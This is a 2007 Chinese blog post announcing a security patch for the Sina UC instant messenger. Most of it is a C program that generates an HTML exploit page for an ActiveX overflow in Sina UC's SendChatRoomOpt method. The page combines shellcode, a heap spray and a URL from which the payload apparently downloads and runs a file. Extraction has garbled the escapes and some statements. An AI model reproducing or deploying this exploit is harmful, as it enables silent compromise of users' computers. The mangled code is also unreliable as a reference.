新浪UC安全补丁SP1和攻击代码

2007年1月11日 | 分类: IM专区

新浪UC在2007.01.10上午放出了针对前天发现的bug的补丁，原文：“新浪UC安全补丁，2007年1月10日以前发布的新浪UC各版本客户端需要立即安装，非常重要。”
下载页面:http://download.51uc.com/uc_download.shtml?tool_0


同时国内攻击组织放出攻击代码:
//////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Sina UC 2006 Activex SendChatRoomOpt Exploit
// Code by 云舒 & LuoLuo,ph4nt0morg
//////////////////////////////////////////////////////////////////////////////////////////////////////////////

#include
#include
#include
#include

// Output stream for the generated HTML page; opened and closed in main().
FILE *fp = NULL;
// Name of the HTML file main() writes to the current directory.
char *file = “fuck_uc.html”;
// Taken from argv[1] in main(); copied into buffer right after sc.
char *url = NULL;

// Payload bytes that PrintPayLoad() encodes into the page. As reproduced
// here the string's escape sequences did not survive the page's text
// extraction, so this listing does not compile as published.
unsigned char sc[] =
“x60x64xa1x30x00x00x00x8bx40x0cx8bx70x1cxadx8bx70”
“x08x81xecx00x04x00x00x8bxecx56x68x8ex4ex0execxe8”
“xffx00x00x00x89x45x04x56x68x98xfex8ax0exe8xf1x00”
“x00x00x89x45x08x56x68x25xb0xffxc2xe8xe3x00x00x00”
“x89x45x0cx56x68xefxcexe0x60xe8xd5x00x00x00x89x45”
“x10x56x68xc1x79xe5xb8xe8xc7x00x00x00x89x45x14x40”
“x80x38xc3x75xfax89x45x18xe9x08x01x00x00x5ex89x75”
“x24x8bx45x04x6ax01x59x8bx55x18x56xe8x8cx00x00x00”
“x50x68x36x1ax2fx70xe8x98x00x00x00x89x45x1cx8bxc5”
“x83xc0x50x89x45x20x68xffx00x00x00x50x8bx45x14x6a”
“x02x59x8bx55x18xe8x62x00x00x00x03x45x20xc7x00x5c”
“x7ex2ex65xc7x40x04x78x65x00x00xffx75x20x8bx45x0c”
“x6ax01x59x8bx55x18xe8x41x00x00x00x6ax07x58x03x45”
“x24x33xdbx53x53xffx75x20x50x53x8bx45x1cx6ax05x59”
“x8bx55x18xe8x24x00x00x00x6ax00xffx75x20x8bx45x08”
“x6ax02x59x8bx55x18xe8x11x00x00x00x81xc4x00x04x00”
“x00x61x81xc4xdcx04x00x00x5dxc2x24x00x41x5bx52x03”
“xe1x03xe1x03xe1x03xe1x83xecx04x5ax53x8bxdaxe2xf7”
“x52xffxe0x55x8bxecx8bx7dx08x8bx5dx0cx56x8bx73x3c”
“x8bx74x1ex78x03xf3x56x8bx76x20x03xf3x33xc9x49x41”
“xadx03xc3x56x33xf6x0fxbex10x3axf2x74x08xc1xcex0d”
“x03xf2x40xebxf1x3bxfex5ex75xe5x5ax8bxebx8bx5ax24”
“x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8bx04x8bx03xc5”
“x5ex5dxc2x08x00xe8xf3xfexffxffx55x52x4cx4dx4fx4e”
“x00”;

// Page prefix written before the payload: the spray target address and the
// opening of the `shellcode` string. The surrounding HTML tags were stripped
// by the page extraction, leaving only the script fragments and blank pieces.
char * header =
” “
” “
” “
” “
“var heapSprayToAddress = 0×0c0c0c0c; “
“var shellcode = unescape(“%u9090″+”%u9090″+ “;

// Page suffix written after the payload: a heap-spray routine that fills an
// array of 1 MiB blocks with repeated 0x9090 filler followed by the payload,
// up to heapSprayToAddress. Several statements are truncated in this listing
// (the `for` and `while` conditions end mid-expression), so the exact script
// emitted cannot be read from here. Detection note: a page that instantiates
// the BROWSER2UC.BROWSERToUC ProgID together with this spray pattern is the
// observable artifact.
char * footer =
” “
“var heapBlockSize = 0×100000; “
“var payLoadSize = shellcode.length * 2; “
“var spraySlideSize = heapBlockSize – (payLoadSize+0×38); “
“var spraySlide = unescape(“%u9090%u9090”); “
“spraySlide = getSpraySlide(spraySlide,spraySlideSize); “
“heapBlocks = (heapSprayToAddress – 0×100000)/heapBlockSize; “
“memory = new Array(); “
“for (i=0;i
” memory = spraySlide + shellcode; } “

“function getSpraySlide(spraySlide, spraySlideSize) { “
“while (spraySlide.length*2
“{ spraySlide += spraySlide; } “
” spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } “;

// Writes the bytes in lpBuff to fp as a JavaScript string of %uXXXX escapes,
// one escape per 16-bit unit, starting a new string fragment every 16 bytes.
// lpBuff:   payload bytes (sc followed by the URL, assembled in main()).
// buffsize: number of bytes to encode. The buffer is read through an
//           unsigned short pointer, so when buffsize is odd the final read
//           takes one byte beyond buffsize (and the char* -> unsigned short*
//           cast ignores alignment and aliasing rules).
// The delimiter literals on the fprintf lines below are mangled in this
// listing (closing quotes and concatenation tokens lost), so the exact text
// emitted around each fragment cannot be read from here.
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i < buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
// Boundary of a 16-byte chunk: close the previous fragment, open the next.
fprintf(fp, “%s”, “” + “”);
}
else
{
// First chunk: open the string.
fprintf(fp, “%s”, “””);
}
}
// One escape per 16-bit unit of the buffer, as read through unsigned short*.
fprintf(fp, “%%u%0.4x”,((unsigned short*)lpBuff)[i/2]);
}
// Print the shellcode after the header, then close it with " ) ".
fprintf(fp, “%s”, “”); “);
}

// Entry point: writes an HTML page (see `file`) consisting of `header`, the
// encoded payload plus URL, `footer`, and a script that instantiates the
// BROWSER2UC.BROWSERToUC control and calls SendChatRoomOpt with a long
// first argument (len 'A' characters followed by a 0x0c0c0c0c marker).
// argv[1]: URL appended after sc; argv[2]: target selector, "1" or "2".
// Returns -1 on a usage error, a rejected URL or an fopen failure. On
// success control falls off the end without a return statement.
int main( int argc, char *argv[] )
{
if( argc != 3 )
{
printf( ” UC ActiveX object exp,Code by 云舒 &amp; LuoLuo,ph4nt0morg ” );
printf( “Usage: %s “, argv[0] );
printf( ” 1 Windows XP SP2 Chinese version,IE 6 ” );
printf( ” 2 Windows 2003 standard SP1 Chinese Version, IE 6 ” );

return -1;
}

// Script fragment that drives the control; filled by sprintf() below.
char seh[1024] = { 0 };
// atoi() reports no errors: any argv[2] other than "1" or "2" leaves len at 0
// and the generated script still runs with an empty filler.
int os = atoi( argv[2] );
// Length of the 'A' filler; one hard-coded value per target selector.
int len = 0;

if( os == 1 )
{
len = 3133;
}
else if( os == 2 )
{
len = 3193;
}

// The format string with %d expanded is well under 1024 bytes, so this
// sprintf() stays within seh. url is assigned from argv[1] on the same line.
sprintf( seh , “var obj = new ActiveXObject(“BROWSER2UC.BROWSERToUC”); var arg1; for( var i = 0; i < %d; i ++ ) { arg1 += "A"; }arg1=arg1 + unescape("%%0c%%0c%%0c%%0c"); arg2="defaultV"; arg3=1; arg4=1; obj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4); ", len ); url = argv[1];
// NOTE(review): strstr() finds the scheme anywhere in the string, not only at
// the start, so this check is weaker than the error message claims.
if( (!strstr(url, “http://”) && !strstr(url, “ftp://”)) || strlen(url) < 10)
{
printf(“[-] Invalid url. Must start with 'http://','ftp://' “);
return -1;
}

printf(“[+] download url:%s “, url);

fp = fopen( file , “w” );
if( fp == NULL )
{
// GetLastError() implies a Win32 build; the matching header is not visible
// in this listing.
printf( “Create file error: %d “, GetLastError() );
return -1;
}
fprintf( fp, “%s”, header );
fflush( fp );

// Zero-initialised so the byte after the copied URL serves as its terminator.
char buffer[4096] = { 0 };
// sizeof(sc)-1 drops the string literal's own terminating NUL.
int sc_len = sizeof(sc)-1;
memcpy(buffer, sc, sc_len);
// The URL length is not checked against the space left after sc, so an
// over-long argv[1] writes past the end of buffer here.
memcpy(buffer+sc_len, url, strlen(url));

// +1 so the URL's terminating NUL is part of the encoded payload.
sc_len += strlen(url)+1;
PrintPayLoad((char *)buffer, sc_len);
fflush( fp );

fprintf( fp, “%s”, footer );
fprintf( fp, “%s”, seh );

fflush( fp );
fclose( fp );

printf( “Create done!please look %s “, file );
}
